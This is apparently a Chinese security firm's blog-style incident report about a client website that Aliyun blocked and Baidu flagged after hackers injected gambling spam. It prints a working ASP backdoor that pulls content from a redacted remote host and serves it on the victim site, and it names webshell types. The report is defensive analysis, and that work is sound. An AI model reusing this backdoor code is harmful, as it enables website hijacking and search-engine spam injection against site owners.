客戶反映說，第一時間打開網站就是提示該內容被禁止訪問，緊接著收到了一份來自阿裏雲的”違規URL屏蔽訪問處理通知”郵件提醒,郵件內容如下：

您的網站URL：xxx/content-80-3006-1.html涉及違法不良信息，違反了相關服務協議和《互聯網信息服務管理辦法》第十五條規定，目前阿裏雲已對您的違法URL做屏蔽訪問處理。如果您對本通知的內容存有疑問，請及時工單或者電話聯系我們， 謝謝您對阿裏雲的支持。

被阿裏雲違規URL屏蔽訪問提示後隨後，我們安排技術人員對其網站在各大搜索引擎的收錄情況，進行安全檢查，發現了問題，在百度搜索客戶網站域名，發現客戶網站被百度提示:百度網址安全中心提醒您：該頁面可能存在違法信息！ 客戶的網站首頁標題也被篡改成了什麽世界杯投註的內容。

1.網站被提示違規URL問題分析

網站域名-違法違規信息處理方案依據《產品購買服務協議》第 3 條權利及義務、《阿裏雲平臺規則》、《網絡安全法》、《互聯網信息服務管理辦法》、《公安 33 號令》等，站點如果存在相關違法違規信息，我方會對存在相關違規信息的 URL 和站點域名進行訪問屏蔽。當訪問您的網站出現以下頁面時，您可以按照以下步驟解封。

如何查看違規信息？

您可以通過雲盾安全管控臺-安全管控-互聯網有害信息查看涉及違法違規的 URL 信息。

如何申請解除屏蔽？

若您的站點只有部分 URL 鏈接無法訪問，需要根據系統的提醒，完全刪除所有違法鏈接內的不合規信息後，通過雲盾安全管控臺-安全管控-互聯網有害信息進行自主解除處罰 （具體適應場景請見下FAQ）。若您的站點域名下所有 URL 都無法訪問。

申請解除屏蔽條件如下：

第一次處罰，申請解除屏蔽條件：將您的網站違法文件、違法頁面進行徹底整改刪除（包括但不限於我們通知的內容）；在公安備案平臺申請公安備案，截圖並通過工單反饋售後技術支持，申請解除屏蔽。

特別註意：

第二次 7 天累計超過 100 條，我們會再次關停您的網站，並取消您的賬號參加阿裏雲平臺全年營銷活動的資格。第三次我們將永久關停您的網站，不再提供解鎖申請，並且您的賬號取消購買資格，後期將無法再在阿裏雲平臺進行任何產品購買。處罰標準：阿裏雲業務安全團隊執行監管政策，針對網民舉報或監管下發 7 天累計超過 100 個違法頁面的網站進行升級處罰。處罰標準如下：累積次數處罰手段解鎖方式第一次（7 天累計違規網頁達 100 條）阻斷域名阻斷域名第二次（7 天累計違規網頁達 100 條）阻斷域名且 1 年內禁止參加阿裏雲平臺營銷活動完全整改、公安平臺成功備案、參加網站安全管理考試及培訓。

第三次（7 天累計違規網頁達 100 條）阻斷域名，賬號禁止購買且永不開通永不開通.

2.網站安全問題分析

接到客戶反映的安全問題後我們Sinesafe安全審計部門技術人員立即對該客戶的網站代碼進行詳細的安全檢測與分析,發現網站裏的一些頁面存在×××後門，甚至有些頁面裏含有惡意代碼，截取一段遠程執行代碼。

上述代碼是遠程獲取http地址裏面的內容，然後在客戶的網站裏，進行訪問。內容都是一些×××、×××、世界杯投註內容。很顯然，客戶的網站被××××××了,網站的程序源代碼也是被上傳了網站×××後門，通過檢測發現的×××後門中存在百度劫持快照×××，專門劫持百度的蜘蛛進行抓取×××擬定好的×××內容，讓百度收錄並進行相關的×××關鍵詞排名。×××篡改的這些內容，讓百度收錄是有目的性的。因為網站的權重在百度裏越高，百度收錄的頁面排名就會越靠前,導致這些違規內容的排名越來越靠前，獲取到的×××、×××客戶就越多。通過這個手段來達到目的也是太不擇手段了，竟然損害我們客戶網站的利益，來達到×××自己的利益。既然了解了為何網站被阿裏雲提示違規URL屏蔽訪問，那麽就要對網站安全進行全面的代碼安全審計工作,對網站的所有文件，代碼，圖片，數據庫裏的內容，進行了詳細的安全檢測與對比，從SQL註入測試、XSS跨站安全測試、表單繞過、文件上傳漏洞測試、文件包含漏洞檢測、網頁掛馬、網頁後門×××檢測、包括一句話小馬、aspx大馬、腳本×××後門、敏感信息泄露測試、任意文件讀取、目錄遍歷、弱口令安全檢測等方面進行了全面的安全檢測，與漏洞修復.

3.網站安全問題處理過程

通過我們SINE安全審計部門技術人員對該網站的全面安全檢測審計後,發現客戶用的是獨立服務器win2008 64位系統，網站采用的架構是php+aspx+asp+mysql 屬於多個程序語言混合架構，查找到的網站×××後門特多,其中有個asp的代碼貼出來給大家看下：

<%

server.timeout=999999

Remote_server="http//xxxxx/" //* 遠程地址

host_name="http//"&request.servervariables("HTTP_HOST")&request.servervariables("_name")

Remote_file = Remote_server&"/index.php"&"?host="&host_name&"&url="&Request.servervariables("Query_String")&"&domain="&Request.servervariables("Server_Name")

Content_mb=GetHtml(Remote_file)

response.write Content_mb

%>

<%

Function GetHtml(url)

Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP")

ObjXMLHTTP.Open "GET",url,False

ObjXMLHTTP.setRequestHeader "User-Agent","aQ0O010O"

ObjXMLHTTP.send

GetHtml=ObjXMLHTTP.responseBody

Set ObjXMLHTTP=Nothing

set objStream = Server.CreateObject("Adodb.Stream")

objStream.Type = 1

objStream.Mode =3

objStream.Open

objStream.Write GetHtml

objStream.Position = 0

objStream.Type = 2

objStream.Charset = "gb2312"

GetHtml = objStream.ReadText

objStream.Close

End Function

%>

上述代碼主要功能是：通過該asp文件向×××的遠程地址進行GET訪問,該代碼還做了判斷條件,對瀏覽器的Header信息做了判斷,如果User-Agent是aQ0O010O 那麽就會允許get獲取到內容,如果是其他的User-Agent內容則跳轉到404默認頁面,內容圖如下：

由此可見，這個×××的×××手法也是非常高的,讓你無從察覺因為就是個404頁面。偽裝的太逼真了，（看來是遇到真愛了，哈哈，忽悠小少女還是可以，但是對不起我們SINE安全是認真的），訪問用戶通過搜索引擎打開的直接就顯示這個×××內容,如果是在瀏覽器直接打開地址就會出現這個404 Not Found的內容。

在網站的圖片，以及數據庫配置文件目錄裏還發現了一些一句話後門×××以及圖片×××：

清除掉這些×××後門後,網站安全並沒有做完,接下來最重要的是要看網站是怎麽被上傳腳本×××後門的。通過對網站的全面安全檢測、以及網站漏洞檢測，發現客戶的網站存在sql註入以及網站上傳漏洞,以及後臺可以cookie繞過登錄權限漏洞，可以直接上傳腳本×××，拿到服務器權限，從而進行修改篡改網站代碼,發現漏洞後，我們隨即對該客戶網站的漏洞進行修復加固，網站防篡改部署。針對於阿裏雲提示：違規URL屏蔽訪問處理通知，我們也幫忙提交阿裏雲工單過去，阿裏雲的工程處理效率還是蠻快的，第一時間對網站的屏蔽訪問進行了解除，至此問題得已解決。

百度網址安全中心提醒您：該頁面可能存在違法信息！處理過程及解決辦法